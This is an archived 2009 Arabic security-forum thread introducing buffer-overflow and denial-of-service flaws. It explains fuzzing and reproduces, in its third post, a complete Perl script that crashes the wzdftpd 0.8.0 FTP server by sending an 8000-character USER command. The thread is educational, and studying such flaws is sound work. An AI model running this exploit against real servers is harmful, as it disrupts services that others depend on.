الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

Buffer Overflow & Dos

بدأه حازم مفيد في 21 فبراير 2009 · 3 رد · 898 مشاهدة · في قسم أمن المعلومات العام
مشاركة: واتساب X فيسبوك تيليجرام
#1 صاحب الموضوع

السلام عليكم ورحمة الله وبركاتة

اهلا بكم جميعا ارحب بكم

سنفتح نقاش حول ثغرات الفيض وثغرات الانقطاع في الخدمه ( Denial of service )

كيفية اكتشافها واستغلالها

وايضا سنجيب على اسئلتكم حول الامر

..............................

في امان الله

تم تعديل هذه المشاركة بواسطة حازم مفيد في 21 فبراير 2009 في 22:00

tvquran_7.gif

Secur1ty-Area

#2

السلام عليكم

عملية الـFuzzing :

سنتحدث باذن الله عن هذه الجزئيه

وساناقش انا في البدايه :

ماهي عملية الفازينج :

العمليه هذه هي عملية مطلوبه لاكتشاف ثغرات الفيض

تستخدم بكثرة في برامج الـ FTP

مثال

عندك برنامج افتي بي وتريد اكتشاف ثغرة فيض فيه ماذا تفعل

اول شئ تستخدم اداة fuzzing لارسال

كم كبير جدا من البيانات على ايبي الافتي بي مما يؤدي الى حصول الفيض

مثال حقيقي بالفيديو سيوضح لك المفهوم : -

http://www.milw0rm.com/video/watch.php?id=63

*****************************************

سوف اشرح لكم فيديو عن اكتشاف ثغرة فيض في برنامج

وفيديو اخر لكتابة الاستغلال على برنامج حقيقي

باذن الله

انتظركم

تم تعديل هذه المشاركة بواسطة حازم مفيد في 21 فبراير 2009 في 21:47

tvquran_7.gif

Secur1ty-Area

#3

مثال برمجي على عملية الـ

Fuzzing

في برنامج WzdFtpd

الثغرة :

http://www.milw0rm.com/exploits/4498

هذا الكود



print "\n |-------------------------------------------------|";
print "\n | Indonesian Newhack Technology |";
print "\n |-------------------------------------------------|";
print "\n | wzdftpd 0.8.0 (USER) Remote Danial of Service |";
print "\n | Found by k1tk4t [k1tk4t(at)newhack.org] |";
print "\n |-------------------------------------------------|";
print "\n |";

if (@ARGV < 2)
{
print "\n[!] Penggunaan: perl wzdftpd0.8.0.pl [Host] [Port] ";
print "\n[!] Contoh: perl wzdftpd0.8.0.pl 127.0.0.1 21";
exit;
}


$ip = $ARGV[0];
$port = $ARGV[1];

$exploit = "A" x 8000;

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Koneksi: Gagal!\n";
print "\n[+] Koneksi: Ok!\n";
print "[+] Menggirim Packet DoS...\n";

print $socket "USER $exploit\n";
sleep(5);
close($socket);
use IO::Socket;

تعالا نشوف اللي يهمنا في الكود نشوف الاول المتغير

$exploit والذي قيمته 8000 من حرف الـ A

ومن ثم قام بفتح المنفذ للاتصال بالافتي بي سيرفس

وبعد الاتصال ارسال المتغير

$exploit والذي يحمل كم هائل من البيانات

...

انتهى

في امان الله

tvquran_7.gif

Secur1ty-Area

#4

مقاله جميله جدا تتحدث عن ثغرات الـ Buffer

عنوان المقاله : Smashing The Stack For Fun And Profit

http://www.amsta.leeds.ac.uk/~read/bofs.html

في امان الله

tvquran_7.gif

Secur1ty-Area

مواضيع مشابهة